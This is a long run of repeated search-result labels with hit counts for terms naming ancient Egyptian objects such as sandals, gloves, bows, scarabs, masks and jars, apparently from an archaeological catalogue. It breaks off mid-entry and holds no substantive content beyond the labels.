(hits/occ.: 1)Results List for glove - (hits/occ.: 10)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 14)Results List for loin - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for de - (hits/occ.: 418)Results List for glove - (hits/occ.: 10)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for de - (hits/occ.: 418)Results List for loin - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for - (hits/occ.: 0)Results List for mask - (hits/occ.: 1)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for loin - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for jar - (hits/occ.: 61)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 14)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for scarab - (hits/occ.: 15)Results List for de - (hits/occ.: 418)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for basket - (hits/occ.: 128)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for glove - (hits/occ.: 10)Results List for anubis - (hits/occ.: 5)Results List for mask - (hits/occ.: 1)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for glass - (hits/occ.: 28)Results List for mask - (hits/occ.: 1)Results List for mask - (hits/occ.: 1)Results List for glass - (hits/occ.: 28)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for de - (hits/occ.: 418)Results List for de - (hits/occ.: 418)Results List for glass - (hits/occ.: 28)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for sandal - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for de - (hits/occ.: 418)Results List for basket - (hits/occ.: 128)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for fruit - (hits/occ.: 9)Results List for - (hits/occ.: 0)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for food - (hits/occ.: 49)Results List for loin - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for de - (hits/occ.: 418)Results List for shield - (hits/occ.: 8)Results List for mask - (hits/occ.: 1)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for food - (hits/occ.: 49)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 14)Results List for anubis - (hits/occ.: 5)Results List for anubis - (hits/occ.: 5)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for jar - (hits/occ.: 61)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for glove - (hits/occ.: 10)Results List for fruit - (hits/occ.: 9)Results List for fruit - (hits/occ.: 9)Results List for fruit - (hits/occ.: 9)Results List for bow - (hits/occ.: 59)Results List for de - (hits/occ.: 418)Results List for de - (hits/occ.: 418)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for scarab - (hits/occ.: 15)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for basket - (hits/occ.: 128)Results List for arrow - (hits/occ.: 29)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 14)Results List for loin - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for fruit - (hits/occ.: 9)Results List for loin - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for glove - (hits/occ.: 10)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for food - (hits/occ.: 49)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for fruit - (hits/occ.: 9)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for jar - (hits/occ.: 61)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for scarab - (hits/occ.: 15)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for de - (hits/occ.: 418)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for fruit - (hits/occ.: 9)Results List for linen - (hits/occ.: 79)Results List for mask - (hits/occ.: 1)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for anubis - (hits/occ.: 5)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for fruit - (hits/occ.: 9)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for gauntlet - (hits/occ.: 15)Results List for loin - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for de - (hits/occ.: 418)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for basket - (hits/occ.: 128)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for de - (hits/occ.: 418)Results List for loin - (hits/occ.: 25)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for sandal - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for jar - (hits/occ.: 61)Results List for anubis - (hits/occ.: 5)Results List for glass - (hits/occ.: 28)Results List for fruit - (hits/occ.: 9)Results List for scarab - (hits/occ.: 15)Results List for anubis - (hits/occ.: 5)Results List for basket - (hits/occ.: 128)Results List for loin - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 14)Results List for mask - (hits/occ.: 1)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for - (hits/occ.: 0)Results List for shield - (hits/occ.: 8)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for loin - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for jar - (hits/occ.: 61)Results List for anubis - (hits/occ.: 5)Results List for glass - (hits/occ.: 28)Results List for fruit - (hits/occ.: 9)Results List for de - (hits/occ.: 418)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 14)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for glove - (hits/occ.: 10)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for fruit - (hits/occ.: 9)Results List for sandal - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 14)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for fruit - (hits/occ.: 9)Results List for fruit - (hits/occ.: 9)Results List for food - (hits/occ.: 49)Results List for shield - (hits/occ.: 8)Results List for anubis - (hits/occ.: 5)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for de - (hits/occ.: 418)Results List for glass - (hits/occ.: 28)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for glove - (hits/occ.: 10)Results List for arrow - (hits/occ.: 29)Results List for de - (hits/occ.: 418)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for food - (hits/occ.: 49)Results List for mask - (hits/occ.: 1)Results List for shield - (hits/occ.: 8)Results List for - (hits/occ.: 0)Results List for scarab - (hits/occ.: 15)Results List for loin - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for sandal - (hits/occ.: 25)Results List for wishing cup - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for jar - (hits/occ.: 61)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for de - (hits/occ.: 418)Results List for food - (hits/occ.: 49)Results List for - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for scarab - (hits/occ.: 15)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for arrow - (hits/occ.: 29)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for shield - (hits/occ.: 8)Results List for de - (hits/occ.: 418)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for fruit - (hits/occ.: 9)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for food - (hits/occ.: 49)Results List for mask - (hits/occ.: 1)Results List for de - (hits/occ.: 418)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for de - (hits/occ.: 418)Results List for arrow - (hits/occ.: 29)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for food - (hits/occ.: 49)Results List for loin - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for fruit - (hits/occ.: 9)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for de - (hits/occ.: 418)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for de - (hits/occ.: 418)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for shield - (hits/occ.: 8)Results List for loin - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for de - (hits/occ.: 418)Results List for glove - (hits/occ.: 10)Results List for arrow - (hits/occ.: 29)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for basket - (hits/occ.: 128)Results List for loin - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for linen - (hits/occ.: 79)Results List for de - (hits/occ.: 418)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for de - (hits/occ.: 418)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for shield - (hits/occ.: 8)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for de - (hits/occ.: 418)Results List for shield - (hits/occ.: 8)Results List for fruit - (hits/occ.: 9)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for food - (hits/occ.: 49)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for glove - (hits/occ.: 10)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 14)Results List for glass - (hits/occ.: 28)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for sandal - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for loin - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for de - (hits/occ.: 418)Results List for jar - (hits/occ.: 61)Results List for fruit - (hits/occ.: 9)Results List for de - (hits/occ.: 418)Results List for mask - (hits/occ.: 1)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for jar - (hits/occ.: 61)Results List for fruit - (hits/occ.: 9)Results List for bow - (hits/occ.: 14)Results List for de - (hits/occ.: 418)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for scarab - (hits/occ.: 15)Results List for jar - (hits/occ.: 61)Results List for fruit - (hits/occ.: 9)Results List for de - (hits/occ.: 418)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for scarab - (hits/occ.: 15)Results List for jar - (hits/occ.: 61)Results List for fruit - (hits/occ.: 9)Results List for de - (hits/occ.: 418)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for fruit - (hits/occ.: 9)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for de - (hits/occ.: 418)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for jar - (hits/occ.: 61)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for jar - (hits/occ.: 61)Results List for - (hits/occ.: 0)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for fruit - (hits/occ.: 9)Results List for de - (hits/occ.: 418)Results List for jar - (hits/occ.: 61)Results List for leopard - (hits/occ.: 5)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for food - (hits/occ.: 49)Results List for fruit - (hits/occ.: 9)Results List for arrow - (hits/occ.: 29)Results List for de - (hits/occ.: 418)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for fruit - (hits/occ.: 9)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for basket - (hits/occ.: 128)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for mask - (hits/occ.: 1)Results List for arrow - (hits/occ.: 29)Results List for shield - (hits/occ.: 8)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for fruit - (hits/occ.: 9)Results List for linen - (hits/occ.: 79)Results List for de - (hits/occ.: 418)Results List for de - (hits/occ.: 418)Results List for basket - (hits/occ.: 128)Results List for loin - (hits/occ.: 25)Results List for food - (hits/occ.: 49)Results List for loin - (hits/occ.: 25)Results List for food - (hits/occ.: 49)Results List for fruit - (hits/occ.: 9)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for de - (hits/occ.: 418)Results List for jar - (hits/occ.: 61)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for de - (hits/occ.: 418)Results List for de - (hits/occ.: 418)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for glove - (hits/occ.: 10)Results List for basket - (hits/occ.: 128)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for loin - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for de - (hits/occ.: 418)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for sandal - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for de - (hits/occ.: 418)Results List for - (hits/occ.: 0)Results List for scarab - (hits/occ.: 15)Results List for seal - (hits/occ.: 16)Results List for jar - (hits/occ.: 61)Results List for shield - (hits/occ.: 8)Results List for - (hits/occ.: 0)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for de - (hits/occ.: 418)Results List for fruit - (hits/occ.: 9)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for - (hits/occ.: 0)Results List for scarab - (hits/occ.: 15)Results List for mask - (hits/occ.: 1)Results List for mask - (hits/occ.: 1)Results List for arrow - (hits/occ.: 29)Results List for 1 - (hits/occ.: 145)Results List for scarab - (hits/occ.: 15)Results List for arrow - (hits/occ.: 29)Results List for shield - (hits/occ.: 8)Results List for arrow - (hits/occ.: 29)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for food - (hits/occ.: 49)Results List for de - (hits/occ.: 418)Results List for linen - (hits/occ.: 79)Results List for fruit - (hits/occ.: 9)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for arrow - (hits/occ.: 29)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for arrow - (hits/occ.: 29)Results List for shield - (hits/occ.: 8)Results List for scarab - (hits/occ.: 15)Results List for fruit - (hits/occ.: 9)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for de - (hits/occ.: 418)Results List for shield - (hits/occ.: 8)Results List for - (hits/occ.: 0)Results List for glove - (hits/occ.: 10)Results List for de - (hits/occ.: 418)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for scarab - (hits/occ.: 15)Results List for arrow - (hits/occ.: 29)Results List for glass - (hits/occ.: 28)Results List for de - (hits/occ.: 418)Results List for food - (hits/occ.: 49)Results List for basket - (hits/occ.: 128)Results List for scarab - (hits/occ.: 15)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for fruit - (hits/occ.: 9)Results List for food - (hits/occ.: 49)Results List for de - (hits/occ.: 418)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 14)Results List for mask - (hits/occ.: 1)Results List for fruit - (hits/occ.: 9)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for scarab - (hits/occ.: 15)Results List for basket - (hits/occ.: 128)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for shield - (hits/occ.: 8)Results List for scarab - (hits/occ.: 15)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 14)Results List for glove - (hits/occ.: 10)Results List for scarab - (hits/occ.: 15)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for fruit - (hits/occ.: 9)Results List for mask - (hits/occ.: 1)Results List for 1 - (hits/occ.: 145)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for scarab - (hits/occ.: 15)Results List for sandal - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for de - (hits/occ.: 418)Results List for bouquet - (hits/occ.: 6)Results List for garland - (hits/occ.: 2)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for shield - (hits/occ.: 8)Results List for 1 - (hits/occ.: 145)Results List for sandal - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for wreath - (hits/occ.: 1)Results List for de - (hits/occ.: 418)Results List for arrow - (hits/occ.: 29)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 14)Results List for - (hits/occ.: 0)Results List for gauntlet - (hits/occ.: 15)Results List for de - (hits/occ.: 418)Results List for bouquet - (hits/occ.: 6)Results List for kohl tube - (hits/occ.: 2)Results List for ointment jar - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for wreath - (hits/occ.: 1)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 14)Results List for de - (hits/occ.: 418)Results List for bouquet - (hits/occ.: 6)Results List for de - (hits/occ.: 418)Results List for basket - (hits/occ.: 128)Results List for glass - (hits/occ.: 28)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 14)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for de - (hits/occ.: 418)Results List for loin - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for glove - (hits/occ.: 10)Results List for basket - (hits/occ.: 128)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for scarab - (hits/occ.: 15)Results List for loin - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for de - (hits/occ.: 418)Results List for arrow - (hits/occ.: 29)Results List for de - (hits/occ.: 418)Results List for jar - (hits/occ.: 61)Results List for anubis - (hits/occ.: 5)Results List for glass - (hits/occ.: 28)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for glass - (hits/occ.: 28)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for fruit - (hits/occ.: 9)Results List for shield - (hits/occ.: 8)Results List for - (hits/occ.: 0)Results List for shield - (hits/occ.: 8)Results List for sandal - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for sandal - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for glove - (hits/occ.: 10)Results List for seal - (hits/occ.: 16)Results List for mask - (hits/occ.: 1)Results List for glove - (hits/occ.: 10)Results List for basket - (hits/occ.: 128)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 